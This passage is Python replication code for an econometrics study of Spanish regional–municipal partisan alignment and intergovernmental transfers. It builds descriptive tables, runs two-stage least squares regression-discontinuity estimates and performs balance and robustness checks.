table['Standard Deviation'] = variables.std()
table = table.astype(float).round(2)
table['Variable'] = ["Debt burden","Property tax rate","Property value", "Population","Population density","% Old",
"% Young","% Immigrant","% Unemployed","Income indicator","% Educated","Press circulation",
"Regional revenues pc","Regional debt","Municipal density","Tenure in office"]
table = table.set_index('Variable')
table['Definition'] = ["Debt burden (capital, item 9 of the spending budget, + interest, item 3), as a share of current revenues",
"Nominal property tax rate (IBI), % on assessed property value",
"Assessed property value (thousands of EUR) per capita",
"Resident population",
"Population per square kilometer",
"% resident population older than 65 years",
"% resident population younger than 14 years",
"% resident population non-EU immigrant",
"% resident population unemployed",
"Residents’ income level, as estimated from objective indicators (e.g., cars, bank deposits, etc.)",
"Percentage of people with primary and secondary education. This variable is demeaned",
"Newspaper copies (at the province level) per 1000 inhabitants. This variable is demeaned",
"Current revenues per capita in each region. This variable is demeaned",
"Debt burden (capital, item 9 of the spending budget, + interest, item 3) as a share of current revenues. This variable is demeaned",
"Average population density (population per square kilometer) of the municipalities in each region. This variable is demeaned",
"Dummy equal to one if it is the regional incumbent was not in office the previous term"]
table.style.set_properties(subset= ['Definition'], **{'width-min': '300px'})
return(table)
def descriptive_confounders(data):
variables = data[["ecs1","regre","regde","meanden","regterm","presscirc","educ2"]]
table1 = pd.DataFrame()
table1['Mean'] = variables.mean()
table1['Standard Deviation'] = variables.std()
table1 = table1.astype(float).round(2)
table1['Confounders'] = ["Regional seat margin","Regional revenues pc","Regional debt", "Municipal density",
"Tenure in office","Press circulation","% Educated"]
table1 = table1.set_index('Confounders')
table1['Definition'] = ["Gap btw the seat share of the parties in the regional government and the opposition parties",
"Current revenues per capita in each region",
"Debt burden as a share of current revenues",
"Average population density (population per km^2) of the municipalities in each region",
"Dummy equal to one if it is the regional incumbent was not in office the previous term",
"Newspaper copies (at the province level) per 1000 inhabitants",
"Percentage of people with primary and secondary education"]
    table1 = table1.round(2).style.set_properties(subset=['Definition'], **{'min-width': '300px'})
    return table1
##===============================
## For table 1
def first_stage_2SLS_global(data,cluster_var,covariates):
# cluster_var = codiine -> for the coefficient
# cluster_var = codccaa -> for the p_value
df = data[["ab","dab","dist1","dist2","vda","vda2","codiine","codccaa",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15","lpob", "density", "debt", "vcp", "tipo"]]
y = 'ab'
X = ['dab', 'dist1', 'dist2', 'vda','vda2',
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
if covariates == 1:
X = X + ["lpob", "density", "debt", "vcp", "tipo"]
elif covariates == 0:
X = X
results = mt.reg(
df, # DataFrame
y, # Dependent var (string)
X, # Independent var(s) (string or list of strings)
cluster=cluster_var, # Cluster var (string)
addcons=True
)
return(results)
def first_stage_2SLS_local(data,bandwidth,cluster_var,covariates):
# calculated optimal bandwidth:
# 2h* = 0.386
# h* = 0.193
# h*/2 = 0.0965
# h*/4 = 0.048
df = data[["ab","dab","dist1","dist2","vda","vda2","codiine","codccaa",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15","lpob", "density", "debt", "vcp", "tipo"]]
df_h = df[abs(df.dist1)<bandwidth]
y = 'ab'
X = ['dab', 'dist1', 'vda',
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
if covariates == 1:
X = X + ["lpob", "density", "debt", "vcp", "tipo"]
elif covariates == 0:
X = X
results = mt.reg(
df_h, # DataFrame
y, # Dependent var (string)
X, # Independent var(s) (string or list of strings)
cluster=cluster_var, # Cluster var (string)
addcons=True
)
return(results)
def second_stage_2SLS_global(data,cluster_var,covariates):
df = data[["ab","dab","dist1","dist2","vsa","vsa2","vda","vda2","tk",
"codiine","codccaa",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15","lpob", "density", "debt", "vcp", "tipo"]]
y = "tk" # dependent var
E = ["ab","vsa","vsa2"] # endo reg
Z = ["dab","vda","vda2"] # instrumental
X = ["dist1","dist2",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"] # exo reg
if covariates == 1:
X = X + ["lpob", "density", "debt", "vcp", "tipo"]
elif covariates == 0:
X = X
results = mt.ivreg(df, y, E, Z, X, cluster=cluster_var, addcons=True)
return(results)
def second_stage_2SLS_global_codiine(data,covariates):
df = data[["ab","dab","dist1","dist2","vsa","vsa2","vda","vda2","tk",
"codiine","codccaa",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15","lpob", "density", "debt", "vcp", "tipo"]]
y = "tk" # dependent var
E = ["ab","vsa","vsa2"] # endo reg
Z = ["dab","vda","vda2"] # instrumental
X = ["dist1","dist2",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"] # exo reg
if covariates == 1:
X = X + ["lpob", "density", "debt", "vcp", "tipo"]
elif covariates == 0:
X = X
results = mt.ivreg(df, y, E, Z, X, cluster='codiine', addcons=True)
return(results)
def second_stage_2SLS_global_codccaa(data,covariates):
df = data[["ab","dab","dist1","dist2","vsa","vsa2","vda","vda2","tk",
"codiine","codccaa",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15","lpob", "density", "debt", "vcp", "tipo"]]
y = "tk" # dependent var
E = ["ab","vsa","vsa2"] # endo reg
Z = ["dab","vda","vda2"] # instrumental
X = ["dist1","dist2",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"] # exo reg
if covariates == 1:
X = X + ["lpob", "density", "debt", "vcp", "tipo"]
elif covariates == 0:
X = X
results = mt.ivreg(df, y, E, Z, X, cluster='codccaa', addcons=True)
return(results)
def second_stage_2SLS_local(data,bandwidth,cluster_var,covariates):
# calculated optimal bandwidth:
# 2h* = 0.386
# h* = 0.193
# h*/2 = 0.0965
# h*/4 = 0.048
df = data[["ab","dab","dist1","dist2","vsa","vsa2","vda","vda2","tk",
"codiine","codccaa",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15","lpob", "density", "debt", "vcp", "tipo"]]
df_h = df[abs(df.dist1)<bandwidth]
y = "tk" # dependent var
E = ["ab","vsa"] # endo reg
Z = ["dab","vda"] # instrumental
X = ["dist1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"] # exo reg
if covariates == 1:
X = X + ["lpob", "density", "debt", "vcp", "tipo"]
elif covariates == 0:
X = X
results = mt.ivreg(df_h, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def table1(data,covariates):
table = pd.DataFrame({'2nd_stage': [], 'Std.err(2)': [], 'P-Value(2)': [],
'1st_stage': [], 'Std.err(1)': [], 'P-Value(1)': [],
'Observations': []})
case = ('Global','Local(bd=2h*)','Local(bd=h*)','Local(bd=h*/2)','Local(bd=h*/4)')
table['RD'] = case
table = table.set_index('RD')
#Global estimate
r1 = first_stage_2SLS_global(data,cluster_var = "codiine", covariates = covariates)
p1 = first_stage_2SLS_global(data,cluster_var = "codccaa", covariates = covariates)
#r2 = second_stage_2SLS_global(data,cluster_var = "codiine", covariates = covariates)
r2 = second_stage_2SLS_global_codiine(data,covariates= covariates)
#p2 = second_stage_2SLS_global(data,cluster_var = "codccaa", covariates = covariates)
p2 = second_stage_2SLS_global_codccaa(data,covariates= covariates)
rg = [r2.beta['ab'] ,r2.se['ab'], p2.pt['ab'],
r1.beta['dab'], r1.se['dab'], p1.pt['dab'], r2.N]
table.loc["Global"] = rg
#Local estimates
local = ('Local(bd=2h*)','Local(bd=h*)','Local(bd=h*/2)','Local(bd=h*/4)')
for a in local:
if a == 'Local(bd=2h*)':
bandwidth = 0.386
elif a == 'Local(bd=h*)':
bandwidth = 0.193
elif a == 'Local(bd=h*/2)':
bandwidth = 0.0965
elif a == 'Local(bd=h*/4)':
bandwidth = .048
rslt1 = first_stage_2SLS_local(data,bandwidth = bandwidth,cluster_var = "codiine", covariates = covariates)
pval1 = first_stage_2SLS_local(data,bandwidth = bandwidth,cluster_var = "codccaa", covariates = covariates)
rslt2 = second_stage_2SLS_local(data, bandwidth = bandwidth,cluster_var = "codiine", covariates = covariates)
        # cluster at the regional level (codccaa) for the p-values, mirroring the global case above
        pval2 = second_stage_2SLS_local(data, bandwidth = bandwidth,cluster_var = "codccaa", covariates = covariates)
result = [rslt2.beta['ab'] , rslt2.se['ab'], pval2.pt['ab'],
rslt1.beta['dab'], rslt1.se['dab'], pval1.pt['dab'], rslt2.N]
table.loc[a] = result
return table
##===============================
## For table 2
def effect_of_competition_global(data):
dca_abi = []
dca_vsai = []
dca_2vsai = []
dca_dabi = []
dca_vdai = []
dca_2vdai = []
for i in range(1,16):
dca_abi.append("dca_ab"+str(i))
dca_vsai.append("dca_vsa"+str(i))
dca_2vsai.append("dca_2vsa"+str(i))
dca_dabi.append("dca_dab"+str(i))
dca_vdai.append("dca_vda"+str(i))
dca_2vdai.append("dca_2vda"+str(i))
regional_columns = dca_abi + dca_vsai + dca_2vsai + dca_dabi + dca_vdai + dca_2vdai
other_columns = ["ab","dab","dist1","dist2","ecs1","vsa","vsa2","vda","vda2","tk","codiine",
"codccaa","esas1","vsa_ecs1", "vsa2_ecs1","edas1","vda_ecs1", "vda2_ecs1",
"dist1_ecs1", "dist2_ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
rc = data[regional_columns]
oc = data[other_columns]
df = pd.concat([rc,oc], axis=1).reindex(rc.index)
y = "tk" # dependent var
e = dca_abi + dca_vsai + dca_2vsai
e_ = ["esas1", "vsa_ecs1", "vsa2_ecs1"]
E = e + e_ # endo reg
z = dca_dabi + dca_vdai + dca_2vdai
z_ = ["edas1", "vda_ecs1", "vda2_ecs1"]
Z = z + z_ # instrumental
X = ["dist1_ecs1", "dist2_ecs1", "dist1", "dist2", "ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
cluster_var = 'codccaa'
results = mt.ivreg(df, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def effect_of_competition_local(data, bandwidth):
dca_abi = []
dca_vsai = []
dca_dabi = []
dca_vdai = []
for i in range(1,16):
dca_abi.append("dca_ab"+str(i))
dca_vsai.append("dca_vsa"+str(i))
dca_dabi.append("dca_dab"+str(i))
dca_vdai.append("dca_vda"+str(i))
regional_columns = dca_abi + dca_vsai + dca_dabi + dca_vdai
other_columns = ["ab","dab","dist1","dist2","ecs1","vsa","vsa2","vda","vda2","tk","codiine",
"codccaa","esas1","vsa_ecs1", "vsa2_ecs1","edas1","vda_ecs1", "vda2_ecs1",
"dist1_ecs1", "dist2_ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
rc = data[regional_columns]
oc = data[other_columns]
df = pd.concat([rc,oc], axis=1).reindex(rc.index)
df_h = df[abs(df.dist1)<bandwidth]
y = "tk" # dependent var
e = dca_abi + dca_vsai
e_ = ["esas1", "vsa_ecs1"]
E = e + e_ # endo reg
z = dca_dabi + dca_vdai
z_ = ["edas1", "vda_ecs1"]
Z = z + z_ # instrumental
X = ["dist1_ecs1","dist1","ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
cluster_var = 'codccaa'
results = mt.ivreg(df_h, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def table2(data):
table = pd.DataFrame({'Alignment * RSM': [], 'Std.err(2)': [], 'P-Value(2)': [],
'RSM': [], 'Std.err(1)': [], 'P-Value(1)': [],
'Observations': []})
case = ('Global','Local(bd=2h*)','Local(bd=h*)','Local(bd=h*/2)','Local(bd=h*/4)')
table['RD'] = case
table = table.set_index('RD')
#Global
r1 = effect_of_competition_global(data)
rg = [r1.beta['esas1'] , r1.se['esas1'], r1.pt['esas1'],
r1.beta['ecs1'], r1.se['ecs1'], r1.pt['ecs1'], r1.N]
table.loc["Global"] = rg
#Local
local = ('Local(bd=2h*)','Local(bd=h*)','Local(bd=h*/2)','Local(bd=h*/4)')
for a in local:
if a == 'Local(bd=2h*)':
bandwidth = 0.386
elif a == 'Local(bd=h*)':
bandwidth = 0.193
elif a == 'Local(bd=h*/2)':
bandwidth = 0.0965
elif a == 'Local(bd=h*/4)':
bandwidth = .048
rslt1 = effect_of_competition_local(data,bandwidth = bandwidth)
result = [rslt1.beta['esas1'] , rslt1.se['esas1'], rslt1.pt['esas1'],
rslt1.beta['ecs1'], rslt1.se['ecs1'], rslt1.pt['ecs1'],rslt1.N]
table.loc[a] = result
return table
##===============================
## For table 4
def time_varying_covariates(data, add_columns, add_endo, add_inst ):
dca_abi = []
dca_vsai = []
dca_dabi = []
dca_vdai = []
for i in range(1,16):
dca_abi.append("dca_ab"+str(i))
dca_vsai.append("dca_vsa"+str(i))
dca_dabi.append("dca_dab"+str(i))
dca_vdai.append("dca_vda"+str(i))
regional_columns = dca_abi + dca_vsai + dca_dabi + dca_vdai
other_columns = ["ab","dab","dist1","ecs1","vsa","vda","tk","codiine",
"codccaa","esas1","vsa_ecs1", "edas1","vda_ecs1",
"dist1_ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
all_other_columns = other_columns + add_columns
rc = data[regional_columns]
oc = data[all_other_columns]
df = pd.concat([rc,oc], axis=1).reindex(rc.index)
df_h = df[abs(df.dist1)<0.193]
y = "tk" # dependent var
e = dca_abi + dca_vsai
e_ = ["esas1", "vsa_ecs1"]
E = e + e_ + add_endo # endogenous regressor
z = dca_dabi + dca_vdai
z_ = ["edas1", "vda_ecs1"]
Z = z + z_ + add_inst # instrumental variables
X = ["dist1_ecs1","dist1","ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]#exogeneous regressor
cluster_var = 'codccaa'
results = mt.ivreg(df_h, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def time_varying_covariates_all(data, bandwidth):
dca_abi = []
dca_vsai = []
dca_dabi = []
dca_vdai = []
for i in range(1,16):
dca_abi.append("dca_ab"+str(i))
dca_vsai.append("dca_vsa"+str(i))
dca_dabi.append("dca_dab"+str(i))
dca_vdai.append("dca_vda"+str(i))
regional_columns = dca_abi + dca_vsai + dca_dabi + dca_vdai
other_columns = ["ab","dab","dist1","ecs1","vsa","vda","tk","codiine",
"codccaa","esas1","vsa_ecs1", "edas1","vda_ecs1",
"dist1_ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
add_endo = ["resa","desa","denssa","termssa","presssa","educ2sa",
"vsa_re","vsa_de","vsa_dens","vsa_te","vsa_pr","vsa_edu"]
add_inst = ["reda","deda","densda","termsda","pressda","educ2da",
"vda_re","vda_de","vda_dens","vda_te","vda_pr","vda_edu"]
all_other_columns = other_columns + add_endo + add_inst
rc = data[regional_columns]
oc = data[all_other_columns]
df = pd.concat([rc,oc], axis=1).reindex(rc.index)
df_h = df[abs(df.dist1)<bandwidth]
y = "tk" # dependent var
e = dca_abi + dca_vsai
e_ = ["esas1", "vsa_ecs1"]
E = e + e_ + add_endo# endo reg
z = dca_dabi + dca_vdai
z_ = ["edas1", "vda_ecs1"]
Z = z + z_ + add_inst # instrumental
X = ["dist1_ecs1","dist1","ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]#exo var
cluster_var = 'codccaa'
results = mt.ivreg(df_h, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def table4(data):
table = pd.DataFrame({'(1)': [], '(2)': [], '(3)': [],
'(4)': [], '(5)': [], '(6)': [],
'(7)': []})
case = ('Alig * Reg. seat margin','standard error(0)','p-value(0)',
'Alig * Revenue','standard error(1)','p-value(1)',
'Alig * Debt','standard error(2)','p-value(2)',
'Alig * Population density','standard error(3)','p-value(3)',
'Alig * Tenure in Office','standard error(4)','p-value(4)',
'Alig * Press', 'standard error(5)','p-value(5)',
'Alig * Educated(%)', 'standard error(6)','p-value(6)',
'Reg. seat margin', 'standard error(7)','p-value(7)',
'Observations')
table['Covariates'] = case
table = table.set_index('Covariates')
# build the contents of table
endo_1 = ["resa","vsa_re"]
inst_1 = ["reda","vda_re"]
colu_1 = endo_1 + inst_1
rslt1 = time_varying_covariates(data, colu_1, endo_1 , inst_1)
endo_2 = ["desa","vsa_de"]
inst_2 = ["deda","vda_de"]
colu_2 = endo_2 + inst_2
rslt2 = time_varying_covariates(data, colu_2, endo_2 , inst_2)
endo_3 = ["denssa","vsa_dens"]
inst_3 = ["densda","vda_dens"]
colu_3 = endo_3 + inst_3
rslt3 = time_varying_covariates(data, colu_3, endo_3 , inst_3)
endo_4 = ["termssa","vsa_te"]
inst_4 = ["termsda","vda_te"]
colu_4 = endo_4 + inst_4
rslt4 = time_varying_covariates(data, colu_4, endo_4 , inst_4)
endo_5 = ["presssa","vsa_pr"]
    inst_5 = ["pressda","vda_pr"]  # matches the presssa/pressda pair used in time_varying_covariates_all
colu_5 = endo_5 + inst_5
rslt5 = time_varying_covariates(data, colu_5, endo_5 , inst_5)
endo_6 = ["educ2sa","vsa_edu"]
inst_6 = ["educ2da","vda_edu"]
colu_6 = endo_6 + inst_6
rslt6 = time_varying_covariates(data, colu_6, endo_6 , inst_6)
rslt7 = time_varying_covariates_all(data,bandwidth = 0.193)
# fill the table with the contents
table['(1)'] = [rslt1.beta['esas1'], rslt1.se['esas1'], rslt1.pt['esas1'],
rslt1.beta['resa'], rslt1.se['resa'], rslt1.pt['resa'],
' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',
rslt1.beta['ecs1'], rslt1.se['ecs1'], rslt1.pt['ecs1'],rslt1.N]
table['(2)'] = [rslt2.beta['esas1'], rslt2.se['esas1'], rslt2.pt['esas1'],
' ',' ',' ',rslt2.beta['desa'], rslt2.se['desa'], rslt2.pt['desa'],
' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',
rslt2.beta['ecs1'], rslt2.se['ecs1'], rslt2.pt['ecs1'],rslt2.N]
table['(3)'] = [rslt3.beta['esas1'], rslt3.se['esas1'], rslt3.pt['esas1'],
' ',' ',' ',' ',' ',' ',rslt3.beta['denssa'], rslt3.se['denssa'], rslt3.pt['denssa'],
' ',' ',' ',' ',' ',' ',' ',' ',' ',
rslt3.beta['ecs1'], rslt3.se['ecs1'], rslt3.pt['ecs1'],rslt3.N]
table['(4)'] = [rslt4.beta['esas1'], rslt4.se['esas1'], rslt4.pt['esas1'],
' ',' ',' ',' ',' ',' ',' ',' ',' ',
rslt4.beta['termssa'], rslt4.se['termssa'], rslt4.pt['termssa'],
' ',' ',' ',' ',' ',' ',
rslt4.beta['ecs1'], rslt4.se['ecs1'], rslt4.pt['ecs1'],rslt4.N]
table['(5)'] = [rslt5.beta['esas1'], rslt5.se['esas1'], rslt5.pt['esas1'],
' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',
rslt5.beta['presssa'], rslt5.se['presssa'], rslt5.pt['presssa'],' ',' ',' ',
rslt5.beta['ecs1'], rslt5.se['ecs1'], rslt5.pt['ecs1'],rslt5.N]
table['(6)'] = [rslt6.beta['esas1'], rslt6.se['esas1'], rslt6.pt['esas1'],
' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',
rslt6.beta['educ2sa'], rslt6.se['educ2sa'], rslt6.pt['educ2sa'],
rslt6.beta['ecs1'], rslt6.se['ecs1'], rslt6.pt['ecs1'],rslt6.N]
table['(7)'] = [rslt7.beta['esas1'], rslt7.se['esas1'], rslt7.pt['esas1'],
rslt7.beta['resa'], rslt7.se['resa'], rslt7.pt['resa'],
rslt7.beta['desa'], rslt7.se['desa'], rslt7.pt['desa'],
rslt7.beta['denssa'], rslt7.se['denssa'], rslt7.pt['denssa'],
rslt7.beta['termssa'], rslt7.se['termssa'], rslt7.pt['termssa'],
rslt7.beta['presssa'], rslt7.se['presssa'], rslt7.pt['presssa'],
rslt7.beta['educ2sa'], rslt7.se['educ2sa'], rslt7.pt['educ2sa'],
rslt7.beta['ecs1'], rslt7.se['ecs1'], rslt7.pt['ecs1'],rslt7.N]
return(table)
##===========================================
## For balance test(discontinuity test) table
##===========================================
def Balance_test(data,bandwidth,confounder,cluster_var):
# calculated optimal bandwidth:
# 2h* = 0.386
# h* = 0.193
# h*/2 = 0.0965
# h*/4 = 0.048
df = data[["debt", "tipo", "vcp", "pob", "density", "pob_mes6591",
"pob_5_1491", "extr_noeu91", "unempl", "income", "presscirc",
"regre", "regde", "meanden", "educ2", "regterm", "ecs1",
"dab", "dist1", "vda", "codiine", "codccaa","cprov",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]]
df_h = df[abs(df.dist1)<bandwidth]
y = confounder
X = ['dab', 'dist1', 'vda', "dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"]
results = mt.reg(
df_h, # DataFrame
y, # Dependent var (string)
X, # Independent var(s) (string or list of strings)
cluster=cluster_var, # Cluster var (string)
addcons=True
)
return(results)
def Balance_test_table(data):
# set the confounders and corresponding optimal bandwidth
combine = {"debt": 0.219, "tipo":0.171, "vcp":0.216, "pob":0.197, "density":0.171, "pob_mes6591":0.185,
"presscirc":0.253, "regre":0.247, "regde":0.245, "meanden":0.275, "educ2":0.347, "regterm":0.287,
"ecs1":0.247, "pob_5_1491":0.183, "extr_noeu91":0.223, "unempl":0.237, "income":0.229}
temp_i = ["debt", "tipo", "vcp", "pob", "density", "pob_mes6591",
"pob_5_1491", "extr_noeu91", "unempl", "income","presscirc",
"regre", "regde", "meanden", "educ2", "regterm", "ecs1"]
# create a table and temporarily set bandwidth value as index
table = pd.DataFrame({'Variable': [], 'Coef.': [], 'SE': [],
'P-value': [], 'Bandwidth': [], 'Observations': []})
table['Variable'] = temp_i
table = table.set_index('Variable')
# regression and result
for i,j in combine.items():
data = data
confounder = i
bandwidth = j
if j < 0.24:
cluster_var = 'codiine'
elif j == 0.253:
cluster_var = 'cprov'
else:
cluster_var = 'codccaa'
rl = Balance_test(data,bandwidth,confounder,cluster_var)
rg = [rl.beta['dist1'] , rl.se['dist1'], rl.pt['dist1'], j, rl.N]
table.loc[i] = rg
table['Variable'] = ["Debt burden","Property tax rate","Property value","Population",
"Population density","% Old","% Young","% Immigrant","% Unemployed",
"Income indicator","Press circulation p.c.","Regional revenues p.c",
"Regional debt","Municipal density","Education","Tenure in office",
"Regional seat margin"]
return(table)
##===========================================
## Robustness Check
##===========================================
def first_stage_2SLS_order(data,order,bandwidth):
df = data
if bandwidth < 1:
df_h = df[abs(df.dist1)<bandwidth]
elif bandwidth == 1:
df_h = df
y = 'ab'
X = ['dab',"dca2","dca3","dca4","dca5","dca6","dca7","dca8",
"dca9","dca10","dca11","dca12","dca13","dca14","dca15"]
if order == 1:
add = ['dist1','vda']
elif order == 2:
add = ['dist1','dist2','vda','vda2']
elif order == 3:
add = ['dist1','dist2','dist3','vda','vda2','vda3']
X = X + add
results = mt.reg(
df_h, # DataFrame
y, # Dependent var (string)
X, # Independent var(s) (string or list of strings)
cluster='codiine', # Cluster var (string)
addcons=True
)
return(results)
def second_stage_2SLS_global(data,order,bandwidth):
df = data
if bandwidth < 1:
df_h = df[abs(df.dist1)<bandwidth]
elif bandwidth == 1:
df_h = df
y = "tk" # dependent var
E = ["ab"] # endo reg
Z = ["dab"] # instrumental
X = ["dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9",
"dca10","dca11","dca12","dca13","dca14","dca15"] # exo reg
if order == 1:
add_endo = ['vsa']
add_inst = ['vda']
add_exo = ['dist1']
elif order == 2:
add_endo = ['vsa','vsa2']
add_inst = ['vda','vda2']
add_exo = ['dist1','dist2']
elif order == 3:
add_endo = ['vsa','vsa2','vsa3']
add_inst = ['vda','vda2','vda3']
add_exo = ['dist1','dist2','dist3']
E = E + add_endo
Z = Z + add_inst
X = X + add_exo
results = mt.ivreg(df_h, y, E, Z, X, cluster='codiine',addcons=True)
return(results)
def table_Poly_Robust(data,bandwidth):
# construct the table
table = pd.DataFrame({'(1)': [], '(2)': [], '(3)': []})
case = ('Second Stage','Alignment','se(2)',
'p-value(2)','First Stage','Reg vote margin','se(1)',
'p-value(1)','Polynomial Order','Observations')
table[' '] = case
table = table.set_index(' ')
# regression results
subset = subset_for_Poly_Robust(data)
rslt_11 = first_stage_2SLS_order(data=subset,order=1,bandwidth = bandwidth)
rslt_12 = first_stage_2SLS_order(data=subset,order=2,bandwidth= bandwidth)
rslt_13 = first_stage_2SLS_order(data=subset,order=3,bandwidth= bandwidth)
rslt_21 = second_stage_2SLS_global(data=subset,order=1,bandwidth= bandwidth)
rslt_22 = second_stage_2SLS_global(data=subset,order=2,bandwidth= bandwidth)
rslt_23 = second_stage_2SLS_global(data=subset,order=3,bandwidth= bandwidth)
#fill the table with the contents
table['(1)'] = [' ', rslt_21.beta['ab'],rslt_21.se['ab'],rslt_21.pt['ab'],
' ',rslt_11.beta['dab'],rslt_11.se['dab'],rslt_11.pt['dab'],'1',rslt_11.N]
table['(2)'] = [' ', rslt_22.beta['ab'],rslt_22.se['ab'],rslt_22.pt['ab'],
' ',rslt_12.beta['dab'],rslt_12.se['dab'],rslt_12.pt['dab'],'2',rslt_12.N]
table['(3)'] = [' ', rslt_23.beta['ab'],rslt_23.se['ab'],rslt_23.pt['ab'],
' ',rslt_13.beta['dab'],rslt_13.se['dab'],rslt_13.pt['dab'],'3',rslt_13.N]
return(table)
def robust_bandwidth_LATE(data):
table = pd.DataFrame({'2nd_stage': [], 'Std.err(2)': [], 'P-Value(2)': [],
'1st_stage': [], 'Std.err(1)': [], 'P-Value(1)': [],
'Observations': []})
case = (0.11,0.13,0.15,0.17,0.193,0.21,0.23,0.25,0.27,0.29)
table['Bandwidth'] = case
table = table.set_index('Bandwidth')
#Local
for i in case:
bandwidth = i
rslt1 = first_stage_2SLS_local(data,bandwidth = bandwidth,cluster_var = "codiine",covariates = 0)
rslt2 = second_stage_2SLS_local(data, bandwidth = bandwidth,cluster_var = "codiine",covariates = 0)
result = [rslt2.beta['ab'] , rslt2.se['ab'], rslt2.pt['ab'],
rslt1.beta['dab'], rslt1.se['dab'], rslt1.pt['dab'], rslt2.N]
table.loc[i] = result
return (table)
def robust_bandwidth_HLATE(data):
table = pd.DataFrame({'Alignment * RSM': [], 'Std.err(2)': [], 'P-Value(2)': [],
'RSM': [], 'Std.err(1)': [], 'P-Value(1)': [],
'Observations': []})
case = (0.11,0.13,0.15,0.17,0.193,0.21,0.23,0.25,0.27,0.29,0.31,0.33,0.35,0.386,0.4)
table['Bandwidth'] = case
table = table.set_index('Bandwidth')
#Local
for i in case:
bandwidth = i
rslt1 = effect_of_competition_local(data,bandwidth = bandwidth)
result = [rslt1.beta['esas1'] , rslt1.se['esas1'], rslt1.pt['esas1'],
rslt1.beta['ecs1'], rslt1.se['ecs1'], rslt1.pt['ecs1'],rslt1.N]
table.loc[i] = result
return (table)
def LATE_for_alternative_align(data,bandwidth,endo,cluster_var):
"""
Compare LATE obtained by different alternative dummy variables which represent
more comprehensible alignement status
"""
df = subset_for_alternative_align(data) # Generate subset
df = df.dropna()
df_h = df[abs(df.dist1)<bandwidth] # Set optimal bandwidth
"""
Take the result of the second stage of Instrument Regression
"""
y = "tk" # dependent var
E = endo # endo reg
Z = ["dab","vda"] # instrumental
X = ["dist1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
"dca11","dca12","dca13","dca14","dca15"] # exo reg
results = mt.ivreg(df_h, y, E, Z, X, cluster=cluster_var,addcons=True)
return(results)
def HLATE_for_alternative_align(data, bandwidth, alter):
"""
Compare HLATE obtained by different alternative dummy variables which represent
more comprehensible alignement status
"""
# add regional fixed effects as controls
dca_bcdi = []
dca_vsbcdi = []
dca_bloci = []
dca_vsbloci = []
dca_dabi = []
dca_vdai = []
for i in range(1,16):
dca_bcdi.append("dca_bcd"+str(i))
dca_vsbcdi.append("dca_vsbcd"+str(i))
dca_bloci.append("dca_bloc"+str(i))
dca_vsbloci.append("dca_vsbloc"+str(i))
dca_dabi.append("dca_dab"+str(i))
dca_vdai.append("dca_vda"+str(i))
regional_columns = dca_bcdi + dca_vsbcdi + dca_bloci + dca_vsbloci + dca_dabi + dca_vdai
rc = data[regional_columns]
oc = subset_for_alternative_align(data)
df = pd.concat([rc,oc], axis=1).reindex(rc.index)
df = df.dropna()
df_h = df[abs(df.dist1)<bandwidth]
# put different endogenous variables to different alternative regression model
if alter == 'part':
E = dca_bcdi + dca_vsbcdi + ["esas1_bis","vsbcd_ecs1"]
elif alter == 'bloc':
E = dca_bloci + dca_vsbloci + ["esas1_bisbis", "vsbloc_ecs1" ]
y = 'tk'
Z = dca_dabi + dca_vdai + ["edas1", "vda_ecs1"]
X = ["dist1_ecs1","dist1","ecs1",
"dca2","dca3","dca4","dca5","dca6","dca7","dca8","dca9","dca10",
